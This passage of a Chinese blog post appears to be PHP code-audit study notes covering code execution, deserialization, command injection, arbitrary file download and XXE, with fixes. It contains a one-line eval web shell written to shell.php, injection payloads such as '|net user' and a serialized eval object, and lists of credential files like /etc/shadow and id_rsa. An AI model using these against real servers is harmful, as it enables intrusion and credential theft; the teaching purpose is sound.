<p><strong>文件操作函数</strong>:</p>
<p>file_put_contents() 函数把一个字符串写入文件中。<br>fputs() 函数写入文件</p>
<p>示例代码:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$test&#x3D;&#39;&lt;?php eval($_POST[cmd]);?&gt;&#39;;</span><br><span class="line">file_put_contents(&#39;test1.php&#39;,$test);</span><br><span class="line">?&gt;</span><br><span class="line">&lt;?php</span><br><span class="line">fputs(fopen(&#39;shell.php&#39;,&#39;w&#39;),&#39;&lt;?php eval($_POST[cmd])?&gt;&#39;);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><strong>动态函数</strong>:</p>
<p>PHP函数直接由字符串拼接<br>示例代码:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">&#x2F;&#x2F;?a&#x3D;assert&amp;b&#x3D;phpinfo()</span><br><span class="line">$_GET[&#39;a&#39;]($_GET[&#39;b&#39;]);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><strong>学习来源:</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">公众号Bypass 《PHP代码审计入门笔记》</span><br></pre></td></tr></table></figure>

</font>

<font size=4 >

<!-- more -->

<h1 id="反序列化漏洞"><a href="#反序列化漏洞" class="headerlink" title="反序列化漏洞"></a>反序列化漏洞</h1><p><strong>0.前言</strong></p>
<p><strong>何为反序列化，那序列化呢:</strong><br>序列化和反序列化是相对的，你可以就将其理解为数据的的编码和解码过程。一种语言系统下的数据结构只有在当前这个系统下才能够识别运行；当数据需要跨语言跨系统传输时，必须将其转成一种中间结构，这个中间结构能被双方识别、还原，这个过程就是序列化和反序列化。 </p>
<p>简单的说，序列化就是把一个对象变成可以传输的字符串，可以以特定的格式在进程之间跨平台安全的进行通信</p>
<p><strong>1.简单案例:</strong></p>
<p>serialize() 序列化：使用函数serialize()可将实例序列化为字符串 unserialize() 反序列化：使用函数unserialize()可将序列化的字符串还原.</p>
<p>示例代码:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class Example &#123;</span><br><span class="line">  var $var &#x3D; &#39;&#39;;</span><br><span class="line">  function __destruct() &#123;</span><br><span class="line">      eval($this-&gt;var);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line">unserialize($_GET[&#39;code&#39;]);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>漏洞利用:<br>构造漏洞利用的代码，保存为test.php，</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class Example &#123;</span><br><span class="line">  var $var &#x3D; &#39;phpinfo();&#39;;</span><br><span class="line">  function __destruct() &#123;</span><br><span class="line">      eval($this-&gt;var);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line">$a&#x3D;new Example();</span><br><span class="line">echo serialize($a);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>运行代码,输出结果:<br>O:7:”Example”:1:{s:3:”var”;s:10:”phpinfo();”;}</p>
<p><strong>提交?code=O:7:”Example”:1:{s:3:”var”;s:10:”phpinfo();”;} 即可执行phpinfo()</strong><br>成功Hacking</p>
<p><strong>2.PHP SESSION反序列化:</strong></p>
<p>主要原因是：<br>ini_set(‘session.serialize_handler’, ‘<strong>php_serialize</strong>’);<br>ini_set(‘session.serialize_handler’, ‘<strong>php</strong>’);<br><strong>两者处理session的方式不同</strong></p>
<p>示例代码:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F;ini_set(&#39;session.serialize_handler&#39;,&#39;php&#39;);</span><br><span class="line">ini_set(&#39;session.serialize_handler&#39;,&#39;php_serialize&#39;);</span><br><span class="line"></span><br><span class="line">session_start();</span><br><span class="line">$_SESSION[&quot;test&quot;]&#x3D;$_GET[&quot;a&quot;];</span><br><span class="line">?&gt;&#x2F;&#x2F;提交?a&#x3D;1111</span><br></pre></td></tr></table></figure>

<p>输出结果:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">php_serialize： a:1:&#123;s:4:&quot;test&quot;;s:4:&quot;1111&quot;;&#125;</span><br><span class="line">php:            test|s:4:&quot;1111&quot;;</span><br></pre></td></tr></table></figure>

<p><strong>3.CTF比赛中的形式:</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">文档：6.反序列化.note</span><br><span class="line">链接：http:&#x2F;&#x2F;note.youdao.com&#x2F;noteshare?id&#x3D;87a37fce0a327efbc6472ddfe6acd7de&amp;sub&#x3D;ABC648E3631D4FB29EFA99E4E995ACA6</span><br></pre></td></tr></table></figure>

<p><strong>学习来源:</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">公众号Bypass 《PHP代码审计入门笔记》</span><br></pre></td></tr></table></figure>

</font>

<font size=4 >

<!-- more -->

<h1 id="命令执行漏洞"><a href="#命令执行漏洞" class="headerlink" title="命令执行漏洞"></a>命令执行漏洞</h1><p><strong>1.简单案例:</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">  $target&#x3D;$_REQUEST[&#39;ip&#39;];</span><br><span class="line">  $cmd &#x3D; shell_exec(&#39;ping &#39;.$target);</span><br><span class="line">  echo &quot;&lt;pre&gt;&#123;$cmd&#125;&lt;&#x2F;pre&gt;&quot;;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><strong>Payload: <a href="http://127.0.0.1/cmd.php?ip=|net" target="_blank" rel="noopener">http://127.0.0.1/cmd.php?ip=|net</a> user</strong></p>
<p>提交以后，命令变成了 shell_exec(‘ping |net user’)</p>
<p><strong>2.常见命令执行函数:</strong></p>
<p>exec()、system()、popen()、passthru()、proc_open()、pcntl_exec()、shell_exec() 、反引号`(实际上是使用shell_exec()函数) 。</p>
<p>system() 输出并返回最后一行shell结果。 exec() 不输出结果，返回最后一行shell结果，所有结果可以保存到一个返<br>回的数组里面。 passthru() 只调用命令，把命令的运行结果原样地直接输出到标准输出设备上。</p>
<p>popen()、proc_open() 不会直接返回执行结果，而是返回一个文件指针</p>
<p><strong>3.漏洞利用及绕过姿势:</strong></p>
<p>详见<a href="https://tonyd0g.gitee.io/2022/01/05/%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/" target="_blank" rel="noopener">[漏洞总结]命令执行漏洞绕过总结</a></p>
<p><strong>4.防护:</strong></p>
<p>PHP内置的两个函数可以有效防止命令执行：</p>
<ul>
<li><strong>escapeshellarg()</strong> :<br>escapeshellarg() 函数将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号，这样以确保能够直接<br>将一个字符串传入 shell 函数，并且还是确保安全的。对于用户输入的部分参数就应该使用这个函数。<br>资料参考：<br><a href="http://cn.php.net/manual/zh/function.escapeshellarg.php" target="_blank" rel="noopener">http://cn.php.net/manual/zh/function.escapeshellarg.php</a></li>
<li><strong>escapeshellcmd()</strong> :<br>escapeshellcmd() 函数对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。 此函数保证用户输入的数<br>据在传送到 exec() 或 system() 函数，或者 执行操作符 之前进行转义。<br>资料参考：<br><a href="http://cn.php.net/manual/zh/function.escapeshellcmd.php" target="_blank" rel="noopener">http://cn.php.net/manual/zh/function.escapeshellcmd.php</a><br>当然，修复方法还有很多方式，修复方式一般有两种思维：<br>1、黑名单：过滤特殊字符或替换字符 2、白名单：只允许特殊输入的类型/长度</li>
</ul>
<p><strong>5.防护实例代码:</strong></p>
<p>实例1:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">  $target&#x3D;$_REQUEST[&#39;ip&#39;];</span><br><span class="line">  &#x2F;&#x2F;将$target拆成数组</span><br><span class="line">  $octet &#x3D; explode( &quot;.&quot;, $target );</span><br><span class="line">  &#x2F;&#x2F;判断各位置是否是数字,即是否是正确的ip</span><br><span class="line">  if( ( is_numeric( $octet[0] ) ) &amp;&amp; ( is_numeric( $octet[1] ) ) &amp;&amp; ( is_numeric($octet[2] ) ) &amp;&amp; ( is_numeric( $octet[3] ) ) &amp;&amp; ( sizeof( $octet ) &#x3D;&#x3D; 4 ) ) </span><br><span class="line">  &#123;</span><br><span class="line">      $target &#x3D; $octet[0] . &#39;.&#39; . $octet[1] . &#39;.&#39; . $octet[2] . &#39;.&#39; . $octet[3];</span><br><span class="line">      $cmd &#x3D; shell_exec(&#39;ping &#39;.$target);</span><br><span class="line">      echo &quot;&lt;pre&gt;&#123;$cmd&#125;&lt;&#x2F;pre&gt;&quot;;</span><br><span class="line">  &#125;</span><br><span class="line">  else &#123;</span><br><span class="line">      echo &#39;&lt;pre&gt;ERROR: You have entered an invalid IP.&lt;&#x2F;pre&gt;&#39;;</span><br><span class="line">  &#125;</span><br><span class="line">?&gt;</span><br><span class="line"></span><br><span class="line">explode函数:</span><br><span class="line">https:&#x2F;&#x2F;www.runoob.com&#x2F;try&#x2F;runcode.php?filename&#x3D;demo_func_string_explode&amp;type&#x3D;php</span><br></pre></td></tr></table></figure>

<p>实例2:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">  $target&#x3D;$_REQUEST[&#39;ip&#39;];</span><br><span class="line">  $cmd &#x3D; shell_exec(&#39;ping &#39;. escapeshellcmd($target));</span><br><span class="line">  echo &quot;&lt;pre&gt;&#123;$cmd&#125;&lt;&#x2F;pre&gt;&quot;;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><strong>学习来源:</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">公众号Bypass 《PHP代码审计入门笔记》</span><br></pre></td></tr></table></figure>

</font>

<font size=4 >

<!-- more -->

<h1 id="任意文件下载"><a href="#任意文件下载" class="headerlink" title="任意文件下载"></a>任意文件下载</h1><p><strong>0.前言:</strong></p>
<p>在文件下载操作中，文件名及路径由客户端传入的参数控制，并且未进行有效的过滤，导致用户可恶意下载任意文件</p>
<p><strong>1.客户端下载:</strong></p>
<p>常见于系统中存在文件(附件/文档等资源)下载的地方.<br>漏洞示例代码:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$filename &#x3D; $_GET[&#39;filename&#39;];</span><br><span class="line">echo file_get_contents($filename);</span><br><span class="line"></span><br><span class="line">header(&#39;Content-Type: imgage&#x2F;jpeg&#39;);</span><br><span class="line">header(&#39;Content-Disposition: attachment; filename&#x3D;&#39;.$filename);</span><br><span class="line">header(&#39;Content-Lengh: &#39;.filesize($filename));</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>文件名用户可控，导致存在任意文件下载漏洞，攻击者提交url<br><strong>?filename=test.php</strong></p>
<p><strong>2.服务端下载:</strong></p>
<p>暂时不懂</p>
<p><strong>3.任意文件下载:</strong></p>
<p>漏洞示例代码:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">  $filename &#x3D; $_GET[&#39;filename&#39;];</span><br><span class="line">  readfile($filename);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>可以看到参数并未进行任何过滤或处理，直接导入readfile函数中执行，导致程序在实现上存在任意文件读取漏洞</p>
<p><strong>Windows:</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">C:\boot.ini &#x2F;&#x2F;查看系统版本</span><br><span class="line">C:WindowsSystem32inetsrvMetaBase.xml &#x2F;&#x2F;IIS配置文件</span><br><span class="line">C:Windowsrepairsam &#x2F;&#x2F;存储系统初次安装的密码</span><br><span class="line">C:Program Filesmysqlmy.ini &#x2F;&#x2F;Mysql配置</span><br><span class="line">C:Program Filesmysqldatamysqluser.MYD &#x2F;&#x2F;Mysql root</span><br><span class="line">C:Windowsphp.ini &#x2F;&#x2F;php配置信息</span><br><span class="line">C:Windowsmy.ini &#x2F;&#x2F;Mysql配置信息C:Windowswin.ini &#x2F;&#x2F;Windows系统的一个基本系统配置文件</span><br></pre></td></tr></table></figure>

<p><strong>Linux:</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;root&#x2F;.ssh&#x2F;authorized_keys</span><br><span class="line">&#x2F;root&#x2F;.ssh&#x2F;id_rsa</span><br><span class="line">&#x2F;root&#x2F;.ssh&#x2F;id_ras.keystore</span><br><span class="line">&#x2F;root&#x2F;.ssh&#x2F;known_hosts &#x2F;&#x2F;记录每个访问计算机用户的公钥</span><br><span class="line">&#x2F;etc&#x2F;passwd</span><br><span class="line">&#x2F;etc&#x2F;shadow</span><br><span class="line">&#x2F;etc&#x2F;my.cnf &#x2F;&#x2F;mysql配置文件</span><br><span class="line">&#x2F;etc&#x2F;httpd&#x2F;conf&#x2F;httpd.conf &#x2F;&#x2F;apache配置文件</span><br><span class="line">&#x2F;root&#x2F;.bash_history &#x2F;&#x2F;用户历史命令记录文件</span><br><span class="line">&#x2F;root&#x2F;.mysql_history &#x2F;&#x2F;mysql历史命令记录文件</span><br><span class="line">&#x2F;proc&#x2F;mounts &#x2F;&#x2F;记录系统挂载设备</span><br><span class="line">&#x2F;porc&#x2F;config.gz &#x2F;&#x2F;内核配置文件</span><br><span class="line">&#x2F;var&#x2F;lib&#x2F;mlocate&#x2F;mlocate.db &#x2F;&#x2F;全文件路径</span><br><span class="line">&#x2F;porc&#x2F;self&#x2F;cmdline &#x2F;&#x2F;当前进程的cmdline参数</span><br></pre></td></tr></table></figure>

<h1 id="XXE"><a href="#XXE" class="headerlink" title="XXE"></a>XXE</h1><p>前言</p>
<figure class="highlight md"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">XXE漏洞通常是由于未正确过滤用户提交的XML数据，导致攻击者可以注入恶意的外部实体或请求远程资源。攻击者可能尝试使用以下协议来利用XXE漏洞：</span><br></pre></td></tr></table></figure>

<p>利用</p>
<figure class="highlight md"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">攻击者可能尝试使用以下协议来利用XXE漏洞：</span><br><span class="line"></span><br><span class="line">HTTP/HTTPS：攻击者可以尝试通过HTTP或HTTPS协议请求远程资源，例如包含恶意内容的XML文件。</span><br><span class="line"></span><br><span class="line">FTP：攻击者可能会使用FTP协议来读取或写入远程文件，通常用于在攻击者控制的FTP服务器上存储恶意文件。</span><br><span class="line"></span><br><span class="line">File：攻击者可能会使用file协议来读取本地文件系统上的敏感文件，例如/etc/passwd等。</span><br><span class="line"></span><br><span class="line">gopher：虽然很少使用，但攻击者可能尝试通过gopher协议来请求远程资源。</span><br><span class="line"></span><br><span class="line">jar：攻击者可以尝试使用jar协议加载远程JAR文件，并执行其中的恶意代码。</span><br></pre></td></tr></table></figure>



<p>修复方案</p>
<figure class="highlight md"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">使用安全的XML解析器：使用安全的XML解析器，并禁用或限制外部实体解析。</span><br><span class="line"></span><br><span class="line">输入验证和过滤：对用户输入的XML数据进行严格的验证和过滤，确保只允许合法的XML内容。</span><br><span class="line"></span><br><span class="line">使用白名单：在XML解析过程中使用白名单来限制允许的实体和外部资源。</span><br><span class="line"></span><br><span class="line">禁用外部实体：禁用或限制XML解析器的外部实体解析功能。</span><br><span class="line"></span><br><span class="line">安全编码实践：避免将敏感数据存储在XML文件中，尤其是将XML文件用于配置文件。</span><br><span class="line"></span><br><span class="line">更新和修补：确保使用的XML解析器和相关库都是最新的，并及时更新修补已知的漏洞。</span><br></pre></td></tr></table></figure>



<p><strong>学习来源:</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">公众号Bypass 《PHP代码审计入门笔记》</span><br><span class="line">ChatGPT</span><br></pre></td></tr></table></figure>




  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/friends/">friends</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="https://github.com/TonyD0g">项目</a></li>
         
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#工作簿"><span class="toc-number">1.</span> <span class="toc-text">工作簿</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#文件上传"><span class="toc-number">2.</span> <span class="toc-text">文件上传</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#文件包含"><span class="toc-number">3.</span> <span class="toc-text">文件包含</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#CSRF"><span class="toc-number">4.</span> <span class="toc-text">CSRF</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#SQL注入"><span class="toc-number">5.</span> <span class="toc-text">SQL注入</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#URL跳转漏洞"><span class="toc-number">6.</span> <span class="toc-text">URL跳转漏洞</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#XSS漏洞"><span class="toc-number">7.</span> <span class="toc-text">XSS漏洞</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#变量覆盖漏洞"><span class="toc-number">8.</span> <span class="toc-text">变量覆盖漏洞</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#代码执行漏洞"><span class="toc-number">9.</span> <span class="toc-text">代码执行漏洞</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#反序列化漏洞"><span class="toc-number">10.</span> <span class="toc-text">反序列化漏洞</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#命令执行漏洞"><span class="toc-number">11.</span> <span class="toc-text">命令执行漏洞</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#任意文件下载"><span class="toc-number">12.</span> <span class="toc-text">任意文件下载</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#XXE"><span class="toc-number">13.</span> <span class="toc-text">XXE</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://github.com/TonyD0g/2022/07/27/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1PHP%E7%AF%87/" target="_blank" rel="noopener"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://github.com/TonyD0g/2022/07/27/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1PHP%E7%AF%87/&text=[代码审计]PHP篇" target="_blank" rel="noopener"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://github.com/TonyD0g/2022/07/27/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1PHP%E7%AF%87/&title=[代码审计]PHP篇" target="_blank" rel="noopener"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://github.com/TonyD0g/2022/07/27/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1PHP%E7%AF%87/&is_video=false&description=[代码审计]PHP篇" target="_blank" rel="noopener"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=[代码审计]PHP篇&body=Check out this article: https://github.com/TonyD0g/2022/07/27/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1PHP%E7%AF%87/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://github.com/TonyD0g/2022/07/27/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1PHP%E7%AF%87/&title=[代码审计]PHP篇" target="_blank" rel="noopener"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://github.com/TonyD0g/2022/07/27/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1PHP%E7%AF%87/&title=[代码审计]PHP篇" target="_blank" rel="noopener"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://github.com/TonyD0g/2022/07/27/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1PHP%E7%AF%87/&title=[代码审计]PHP篇" target="_blank" rel="noopener"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://github.com/TonyD0g/2022/07/27/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1PHP%E7%AF%87/&title=[代码审计]PHP篇" target="_blank" rel="noopener"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://github.com/TonyD0g/2022/07/27/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1PHP%E7%AF%87/&name=[代码审计]PHP篇&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=https://github.com/TonyD0g/2022/07/27/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1PHP%E7%AF%87/&t=[代码审计]PHP篇" target="_blank" rel="noopener"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2023
    TonyD0g
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/friends/">friends</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="https://github.com/TonyD0g">项目</a></li>
         
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">


    <!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>

<!-- clipboard -->

  
<script src="/lib/clipboard/clipboard.min.js"></script>

  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

    <script type="text/javascript">
        (function(i,s,o,g,r,a,m) {i['GoogleAnalyticsObject']=r;i[r]=i[r]||function() {
        (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
        m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
        })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
        ga('create', 'UA-84578611-1', 'auto');
        ga('send', 'pageview');
    </script>

<!-- Baidu Analytics -->

    <script type="text/javascript">
        var _hmt = _hmt || [];
        (function() {
            var hm = document.createElement("script");
            hm.src = "https://hm.baidu.com/hm.js?2e6da3c375c789455b664cea6d4cb29c";
            var s = document.getElementsByTagName("script")[0];
            s.parentNode.insertBefore(hm, s);
        })();
    </script>

<!-- Disqus Comments -->


</body>
</html>
